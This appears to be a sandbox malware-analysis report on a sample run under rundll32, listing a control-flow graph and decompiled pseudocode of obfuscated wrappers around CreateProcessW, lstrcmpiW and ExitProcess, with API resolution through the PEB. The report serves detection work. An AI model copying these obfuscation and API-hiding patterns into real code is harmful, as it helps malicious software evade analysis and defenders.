2c6f699 GetPEB 4164->4167 4165 2c76f53 GetPEB 4165->4171 4166 2c7b945 4167->4166 4170 2c74626 GetPEB 4170->4171 4171->4163 4171->4164 4171->4165 4171->4166 4171->4170 4172 2c62575 4171->4172 4179 2c67a7e 4171->4179 4183 2c6e336 4171->4183 4190 2c80c66 4171->4190 4173 2c6259e 4172->4173 4174 2c76f53 GetPEB 4173->4174 4175 2c6875d GetPEB 4173->4175 4176 2c62b32 4173->4176 4177 2c62b30 4173->4177 4174->4173 4175->4173 4178 2c6f699 GetPEB 4176->4178 4177->4171 4178->4177 4180 2c67a91 4179->4180 4181 2c74626 GetPEB 4180->4181 4182 2c67b3e 4181->4182 4182->4171 4185 2c6e35c 4183->4185 4184 2c70824 GetPEB 4184->4185 4185->4184 4186 2c6e626 4185->4186 4187 2c76f53 GetPEB 4185->4187 4188 2c6e608 4185->4188 4186->4171 4187->4185 4205 2c70824 4188->4205 4191 2c80c99 4190->4191 4192 2c80ad3 GetPEB 4191->4192 4195 2c81955 4191->4195 4196 2c76f53 GetPEB 4191->4196 4199 2c6f699 GetPEB 4191->4199 4200 2c81953 4191->4200 4204 2c72eed GetPEB 4191->4204 4209 2c6ac44 4191->4209 4213 2c7c678 4191->4213 4217 2c692dd 4191->4217 4221 2c8296f 4191->4221 4225 2c636b6 4191->4225 4229 2c65894 4191->4229 4192->4191 4233 2c62cf9 4195->4233 4196->4191 4199->4191 4200->4171 4204->4191 4206 2c70841 4205->4206 4207 2c74626 GetPEB 4206->4207 4208 2c7095a 4207->4208 4208->4186 4210 2c6ac66 4209->4210 4211 2c7e399 GetPEB 4210->4211 4212 2c6ad04 4211->4212 4212->4191 4214 2c7c69a 4213->4214 4215 2c7e399 GetPEB 4214->4215 4216 2c7c75e 4215->4216 4216->4191 4218 2c69302 4217->4218 4219 2c7e399 GetPEB 4218->4219 4220 2c6937c 4219->4220 4220->4191 4222 2c82985 4221->4222 4223 2c7e399 GetPEB 4222->4223 4224 2c82a19 4223->4224 4224->4191 4226 2c636e6 4225->4226 4227 2c7e399 GetPEB 4226->4227 4228 2c6376d 4227->4228 4228->4191 4230 2c658be 4229->4230 4231 2c7e399 GetPEB 4230->4231 4232 2c65964 4231->4232 4232->4191 4234 2c62d0f 4233->4234 4235 2c7e399 GetPEB 4234->4235 4236 2c62db6 4235->4236 4236->4200 3932 2c6567f 3933 2c65739 3932->3933 3937 2c65760 3932->3937 3938 2c7ed95 3933->3938 3949 2c7f32b 3938->3949 3939 2c7f52b 3962 2c806ef 3939->3962 3942 2c6574c 3942->3937 3951 2c6f3f7 3942->3951 3947 2c72eed GetPEB 3947->3949 3948 2c80ad3 GetPEB 3948->3949 3949->3939 3949->3942 3949->3947 3949->3948 3954 2c6e259 3949->3954 3958 2c70207 3949->3958 3972 2c66617 3949->3972 3975 2c624aa 3949->3975 3979 2c806a6 3949->3979 3983 2c63965 3949->3983 3952 2c7e399 GetPEB 3951->3952 3953 2c6f49a ExitProcess 3952->3953 3953->3937 3955 2c6e27f 3954->3955 3987 2c7e399 3955->3987 3959 2c70224 3958->3959 3960 2c7e399 GetPEB 3959->3960 3961 2c702da lstrcmpiW 3960->3961 3961->3949 3963 2c8071d 3962->3963 3964 2c63965 GetPEB 3963->3964 3965 2c8098a 3964->3965 4017 2c79100 3965->4017 3967 2c809c7 3968 2c809d2 3967->3968 4021 2c79038 3967->4021 3968->3942 3971 2c79038 GetPEB 3971->3968 3973 2c7e399 GetPEB 3972->3973 3974 2c666ba 3973->3974 3974->3949 3976 2c624c7 3975->3976 4025 2c623ef 3976->4025 3980 2c806ca 3979->3980 4029 2c6dfb1 3980->4029 3984 2c6397d 3983->3984 4032 2c65821 3984->4032 3988 2c7e43d 3987->3988 3989 2c6e323 3987->3989 3993 2c689e3 3988->3993 3989->3949 3991 2c7e450 3996 2c666c3 3991->3996 4000 2c74315 GetPEB 3993->4000 3995 2c68a8b 3995->3991 3998 2c666de 3996->3998 3997 2c66790 3997->3989 3998->3997 4001 2c835e3 3998->4001 4000->3995 4002 2c83739 4001->4002 4009 2c66560 4002->4009 4005 2c83780 4007 2c837ad 4005->4007 4008 2c666c3 GetPEB 4005->4008 4007->3997 4008->4007 4010 2c66576 4009->4010 4011 2c7e399 GetPEB 4010->4011 4012 2c6660c 4011->4012 4012->4005 4013 2c8308c 4012->4013 4014 2c830a3 4013->4014 4015 2c7e399 GetPEB 4014->4015 4016 2c8313d 4015->4016 4016->4005 4018 2c7913f 4017->4018 4019 2c7e399 GetPEB 4018->4019 4020 2c791da CreateProcessW 4019->4020 4020->3967 4022 2c7904b 4021->4022 4023 2c7e399 GetPEB 4022->4023 4024 2c790f4 4023->4024 4024->3971 4026 2c62416 4025->4026 4027 2c7e399 GetPEB 4026->4027 4028 2c6249a 4027->4028 4028->3949 4030 2c7e399 GetPEB 4029->4030 4031 2c6e057 4030->4031 4031->3949 4033 2c6583c 4032->4033 4036 2c744f4 4033->4036 4037 2c7450e 4036->4037 4038 2c7e399 GetPEB 4037->4038 4039 2c639bc 4038->4039 4039->3949 4237 2c713db 4245 2c7198f 4237->4245 4238 2c79038 GetPEB 4238->4245 4239 2c624aa GetPEB 4239->4245 4240 2c71c03 4241 2c76f53 GetPEB 4241->4245 4243 2c70f17 GetPEB 4243->4245 4244 2c6f699 GetPEB 4244->4245 4245->4238 4245->4239 4245->4240 4245->4241 4245->4243 4245->4244 4248 2c70207 2 API calls 4245->4248 4249 2c72d06 4245->4249 4253 2c7302d 4245->4253 4257 2c82b52 4245->4257 4248->4245 4250 2c72d36 4249->4250 4251 2c7e399 GetPEB 4250->4251 4252 2c72dcf 4251->4252 4252->4245 4254 2c73066 4253->4254 4255 2c7e399 GetPEB 4254->4255 4256 2c73115 4255->4256 4256->4245 4258 2c82b68 4257->4258 4259 2c7e399 GetPEB 4258->4259 4260 2c82c0a 4259->4260 4260->4245

                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 63 2c79100-2c791f6 call 2c68002 call 2c7e399 CreateProcessW
                                                                                                                                                                                      C-Code - Quality: 41%
                                                                                                                                                                                      			E02C79100(void* __ecx, WCHAR* __edx, WCHAR* _a8, struct _PROCESS_INFORMATION* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a36, struct _STARTUPINFOW* _a40, intOrPtr _a44, int _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr _a60, intOrPtr _a64) {
                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                      				signed int _v16;
                                                                                                                                                                                      				signed int _v20;
                                                                                                                                                                                      				struct _SECURITY_ATTRIBUTES* _v24;
                                                                                                                                                                                      				intOrPtr _v28;
                                                                                                                                                                                      				void* _t52;
                                                                                                                                                                                      				int _t60;
                                                                                                                                                                                      				WCHAR* _t64;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t64 = __edx;
                                                                                                                                                                                      				_push(0);
                                                                                                                                                                                      				_push(0);
                                                                                                                                                                                      				_push(_a64);
                                                                                                                                                                                      				_push(_a60);
                                                                                                                                                                                      				_push(_a56);
                                                                                                                                                                                      				_push(_a52);
                                                                                                                                                                                      				_push(_a48);
                                                                                                                                                                                      				_push(_a44);
                                                                                                                                                                                      				_push(_a40);
                                                                                                                                                                                      				_push(_a36);
                                                                                                                                                                                      				_push(0);
                                                                                                                                                                                      				_push(_a28);
                                                                                                                                                                                      				_push(_a24);
                                                                                                                                                                                      				_push(_a20);
                                                                                                                                                                                      				_push(_a16);
                                                                                                                                                                                      				_push(0);
                                                                                                                                                                                      				_push(_a8);
                                                                                                                                                                                      				_push(0);
                                                                                                                                                                                      				_push(__edx);
                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                      				E02C68002(_t52);
                                                                                                                                                                                      				_v28 = 0x2905a5;
                                                                                                                                                                                      				_v24 = 0;
                                                                                                                                                                                      				_v12 = 0xa2d8b8;
                                                                                                                                                                                      				_v12 = _v12 + 0xfffff871;
                                                                                                                                                                                      				_v12 = _v12 ^ 0x5b121ec8;
                                                                                                                                                                                      				_v12 = _v12 ^ 0x21b4fd5f;
                                                                                                                                                                                      				_v12 = _v12 ^ 0x7a067dbd;
                                                                                                                                                                                      				_v8 = 0x36027e;
                                                                                                                                                                                      				_v8 = _v8 ^ 0x6c06375b;
                                                                                                                                                                                      				_v8 = _v8 * 0x51;
                                                                                                                                                                                      				_v8 = _v8 + 0xffff0cdd;
                                                                                                                                                                                      				_v8 = _v8 ^ 0x3b3a0501;
                                                                                                                                                                                      				_v20 = 0x3133e6;
                                                                                                                                                                                      				_v20 = _v20 ^ 0xa81fc925;
                                                                                                                                                                                      				_v20 = _v20 ^ 0xa82b7027;
                                                                                                                                                                                      				_v16 = 0x47f0fa;
                                                                                                                                                                                      				_v16 = _v16 | 0xed8e49a9;
                                                                                                                                                                                      				_v16 = _v16 ^ 0xedcdbeb4;
                                                                                                                                                                                      				E02C7E399(__ecx, __edx, __ecx, 0xa2449830, 0x53, 0xa9376bff);
                                                                                                                                                                                      				_t60 = CreateProcessW(_t64, _a8, 0, 0, _a48, 0, 0, 0, _a40, _a16); // executed
                                                                                                                                                                                      				return _t60;
                                                                                                                                                                                      			}












                                                                                                                                                                                      0x02c7910a
                                                                                                                                                                                      0x02c7910c
                                                                                                                                                                                      0x02c7910d
                                                                                                                                                                                      0x02c7910e
                                                                                                                                                                                      0x02c79111
                                                                                                                                                                                      0x02c79114
                                                                                                                                                                                      0x02c79117
                                                                                                                                                                                      0x02c7911a
                                                                                                                                                                                      0x02c7911d
                                                                                                                                                                                      0x02c79120
                                                                                                                                                                                      0x02c79123
                                                                                                                                                                                      0x02c79126
                                                                                                                                                                                      0x02c79127
                                                                                                                                                                                      0x02c7912a
                                                                                                                                                                                      0x02c7912d
                                                                                                                                                                                      0x02c79130
                                                                                                                                                                                      0x02c79133
                                                                                                                                                                                      0x02c79134
                                                                                                                                                                                      0x02c79137
                                                                                                                                                                                      0x02c79138
                                                                                                                                                                                      0x02c79139
                                                                                                                                                                                      0x02c7913a
                                                                                                                                                                                      0x02c7913f
                                                                                                                                                                                      0x02c79149
                                                                                                                                                                                      0x02c7914c
                                                                                                                                                                                      0x02c79153
                                                                                                                                                                                      0x02c7915a
                                                                                                                                                                                      0x02c79161
                                                                                                                                                                                      0x02c79168
                                                                                                                                                                                      0x02c7916f
                                                                                                                                                                                      0x02c79176
                                                                                                                                                                                      0x02c7918e
                                                                                                                                                                                      0x02c79191
                                                                                                                                                                                      0x02c79198
                                                                                                                                                                                      0x02c7919f
                                                                                                                                                                                      0x02c791a6
                                                                                                                                                                                      0x02c791ad
                                                                                                                                                                                      0x02c791b4
                                                                                                                                                                                      0x02c791bb
                                                                                                                                                                                      0x02c791c2
                                                                                                                                                                                      0x02c791d5
                                                                                                                                                                                      0x02c791ef
                                                                                                                                                                                      0x02c791f6

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CreateProcessW.KERNELBASE(?,EDCDBEB4,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 02C791EF
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000007.00000002.591122734.0000000002C60000.00000040.00000010.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_2c60000_rundll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CreateProcess
                                                                                                                                                                                      • String ID: 31
                                                                                                                                                                                      • API String ID: 963392458-1099231638
                                                                                                                                                                                      • Opcode ID: 802e8488796198306ded7f534c69eccd1f3fee1a7ddcada247a2de1a0aa744a2
                                                                                                                                                                                      • Instruction ID: 2482dea57bbec792d5aae1c3c7b5a91e9b2a0dbb9f649d7bedb45b1ae8d2ed51
                                                                                                                                                                                      • Opcode Fuzzy Hash: 802e8488796198306ded7f534c69eccd1f3fee1a7ddcada247a2de1a0aa744a2
                                                                                                                                                                                      • Instruction Fuzzy Hash: C731C272801259BBCF559FAACD45CDFBFB9FB89714F108158FA1462120C3728A60EFA1
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 68 2c70207-2c702e8 call 2c68002 call 2c7e399 lstrcmpiW
                                                                                                                                                                                      C-Code - Quality: 70%
                                                                                                                                                                                      			E02C70207(void* __ecx, WCHAR* __edx, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                      				signed int _v16;
                                                                                                                                                                                      				signed int _v20;
                                                                                                                                                                                      				void* _v32;
                                                                                                                                                                                      				intOrPtr _v36;
                                                                                                                                                                                      				void* _t54;
                                                                                                                                                                                      				int _t68;
                                                                                                                                                                                      				signed int _t70;
                                                                                                                                                                                      				signed int _t71;
                                                                                                                                                                                      				signed int _t72;
                                                                                                                                                                                      				WCHAR* _t81;
                                                                                                                                                                                      
                                                                                                                                                                                      				_push(_a16);
                                                                                                                                                                                      				_t81 = __edx;
                                                                                                                                                                                      				_push(_a12);
                                                                                                                                                                                      				_push(_a8);
                                                                                                                                                                                      				_push(_a4);
                                                                                                                                                                                      				_push(__edx);
                                                                                                                                                                                      				E02C68002(_t54);
                                                                                                                                                                                      				_v36 = 0xa7e4f2;
                                                                                                                                                                                      				asm("stosd");
                                                                                                                                                                                      				_t70 = 0x7b;
                                                                                                                                                                                      				asm("stosd");
                                                                                                                                                                                      				asm("stosd");
                                                                                                                                                                                      				_v12 = 0x53fdc4;
                                                                                                                                                                                      				_t71 = 0x5a;
                                                                                                                                                                                      				_v12 = _v12 / _t70;
                                                                                                                                                                                      				_v12 = _v12 << 7;
                                                                                                                                                                                      				_v12 = _v12 ^ 0xe1fe8b09;
                                                                                                                                                                                      				_v12 = _v12 ^ 0xe1ac8480;
                                                                                                                                                                                      				_v20 = 0x744728;
                                                                                                                                                                                      				_v20 = _v20 << 0xf;
                                                                                                                                                                                      				_v20 = _v20 ^ 0x239bcee7;
                                                                                                                                                                                      				_v16 = 0xd5199;
                                                                                                                                                                                      				_v16 = _v16 + 0xffff5a50;
                                                                                                                                                                                      				_v16 = _v16 / _t71;
                                                                                                                                                                                      				_v16 = _v16 ^ 0x000f59f5;
                                                                                                                                                                                      				_v8 = 0xa57c1a;
                                                                                                                                                                                      				_v8 = _v8 | 0x119c25df;
                                                                                                                                                                                      				_v8 = _v8 + 0xffffdcc6;
                                                                                                                                                                                      				_t72 = 0x4f;
                                                                                                                                                                                      				_v8 = _v8 / _t72;
                                                                                                                                                                                      				_v8 = _v8 ^ 0x003b1570;
                                                                                                                                                                                      				E02C7E399(_t72, _v8 % _t72, _t72, 0xa2449830, 0x167, 0xa9a77114);
                                                                                                                                                                                      				_t68 = lstrcmpiW(_a8, _t81); // executed
                                                                                                                                                                                      				return _t68;
                                                                                                                                                                                      			}















                                                                                                                                                                                      0x02c7020f
                                                                                                                                                                                      0x02c70212
                                                                                                                                                                                      0x02c70214
                                                                                                                                                                                      0x02c70217
                                                                                                                                                                                      0x02c7021a
                                                                                                                                                                                      0x02c7021d
                                                                                                                                                                                      0x02c7021f
                                                                                                                                                                                      0x02c70224
                                                                                                                                                                                      0x02c70232
                                                                                                                                                                                      0x02c70235
                                                                                                                                                                                      0x02c70238
                                                                                                                                                                                      0x02c70239
                                                                                                                                                                                      0x02c7023a
                                                                                                                                                                                      0x02c70246
                                                                                                                                                                                      0x02c70247
                                                                                                                                                                                      0x02c7024c
                                                                                                                                                                                      0x02c70250
                                                                                                                                                                                      0x02c70257
                                                                                                                                                                                      0x02c7025e
                                                                                                                                                                                      0x02c70265
                                                                                                                                                                                      0x02c70269
                                                                                                                                                                                      0x02c70270
                                                                                                                                                                                      0x02c70277
                                                                                                                                                                                      0x02c70285
                                                                                                                                                                                      0x02c7028a
                                                                                                                                                                                      0x02c70291
                                                                                                                                                                                      0x02c70298
                                                                                                                                                                                      0x02c7029f
                                                                                                                                                                                      0x02c702a9
                                                                                                                                                                                      0x02c702af
                                                                                                                                                                                      0x02c702b2
                                                                                                                                                                                      0x02c702d5
                                                                                                                                                                                      0x02c702e1
                                                                                                                                                                                      0x02c702e8

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • lstrcmpiW.KERNELBASE(000F59F5,00000000,?,?,?,?,?,?,?,9B842ACC,01B64447,00000000), ref: 02C702E1
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000007.00000002.591122734.0000000002C60000.00000040.00000010.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_2c60000_rundll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrcmpi
                                                                                                                                                                                      • String ID: (Gt
                                                                                                                                                                                      • API String ID: 1586166983-558867117
                                                                                                                                                                                      • Opcode ID: bb735ff999d9414c3a9b564c67b10e962bbdffe1a82627d97bbaa383f4a39bdb
                                                                                                                                                                                      • Instruction ID: 3a454630aede84fd4dd6ff76802c0a1edd5f042a4a6290e9d809a7bc4acf3293
                                                                                                                                                                                      • Opcode Fuzzy Hash: bb735ff999d9414c3a9b564c67b10e962bbdffe1a82627d97bbaa383f4a39bdb
                                                                                                                                                                                      • Instruction Fuzzy Hash: CB2178B6E00208FBEF04DFA8CC0A9DEBBB2FB44314F10C599E515AA250D7B65A10DF90
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 73 2c6f3f7-2c6f4a4 call 2c7e399 ExitProcess
                                                                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                                                                      			E02C6F3F7() {
                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                      				signed int _v16;
                                                                                                                                                                                      				signed int _v20;
                                                                                                                                                                                      				signed int _v24;
                                                                                                                                                                                      				signed int _v28;
                                                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                                                      				intOrPtr _v36;
                                                                                                                                                                                      				signed int _t47;
                                                                                                                                                                                      
                                                                                                                                                                                      				_v28 = _v28 & 0x00000000;
                                                                                                                                                                                      				_v24 = _v24 & 0x00000000;
                                                                                                                                                                                      				_v36 = 0xb0bfd;
                                                                                                                                                                                      				_v32 = 0x231de0;
                                                                                                                                                                                      				_v20 = 0x822c7a;
                                                                                                                                                                                      				_t47 = 0x31;
                                                                                                                                                                                      				_push(_t47);
                                                                                                                                                                                      				_v20 = _v20 * 0x25;
                                                                                                                                                                                      				_v20 = _v20 ^ 0x12d3a120;
                                                                                                                                                                                      				_v12 = 0x122796;
                                                                                                                                                                                      				_v12 = _v12 | 0x5fffe7f7;
                                                                                                                                                                                      				_v12 = _v12 ^ 0x5ff36a5b;
                                                                                                                                                                                      				_v8 = 0xc53dc4;
                                                                                                                                                                                      				_v8 = _v8 + 0xffff669e;
                                                                                                                                                                                      				_v8 = _v8 + 0xba03;
                                                                                                                                                                                      				_v8 = _v8 + 0x1f9e;
                                                                                                                                                                                      				_v8 = _v8 ^ 0x00c2122b;
                                                                                                                                                                                      				_v16 = 0x5857ad;
                                                                                                                                                                                      				_v16 = _v16 / _t47;
                                                                                                                                                                                      				_v16 = _v16 ^ 0x000b8ebe;
                                                                                                                                                                                      				E02C7E399(_t47, _v16 % _t47, _t47, 0xa2449830, 0x41, 0x9da8748a);
                                                                                                                                                                                      				ExitProcess(0);
                                                                                                                                                                                      			}












                                                                                                                                                                                      0x02c6f3fd
                                                                                                                                                                                      0x02c6f403
                                                                                                                                                                                      0x02c6f407
                                                                                                                                                                                      0x02c6f40e
                                                                                                                                                                                      0x02c6f415
                                                                                                                                                                                      0x02c6f422
                                                                                                                                                                                      0x02c6f423
                                                                                                                                                                                      0x02c6f429
                                                                                                                                                                                      0x02c6f42c
                                                                                                                                                                                      0x02c6f433
                                                                                                                                                                                      0x02c6f43a
                                                                                                                                                                                      0x02c6f441
                                                                                                                                                                                      0x02c6f448
                                                                                                                                                                                      0x02c6f44f
                                                                                                                                                                                      0x02c6f456
                                                                                                                                                                                      0x02c6f45d
                                                                                                                                                                                      0x02c6f464
                                                                                                                                                                                      0x02c6f46b
                                                                                                                                                                                      0x02c6f479
                                                                                                                                                                                      0x02c6f47c
                                                                                                                                                                                      0x02c6f495
                                                                                                                                                                                      0x02c6f49f

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • ExitProcess.KERNEL32(00000000), ref: 02C6F49F
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000007.00000002.591122734.0000000002C60000.00000040.00000010.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_2c60000_rundll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ExitProcess
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 621844428-0
                                                                                                                                                                                      • Opcode ID: 03812332bf7814123334a19349d3f4d4ec07a23d3eba325336f5a23eb22f412d
                                                                                                                                                                                      • Instruction ID: 9d40e1b3ecaaabc11eba43f42755b2c5596456397666a6f0b49890db2375cb5f
                                                                                                                                                                                      • Opcode Fuzzy Hash: 03812332bf7814123334a19349d3f4d4ec07a23d3eba325336f5a23eb22f412d
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9C11D6B1E1121DEBDF04DFE4D94A6EEBBB4FB14315F108188E521AA250E7B45B558F80
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Non-executed Functions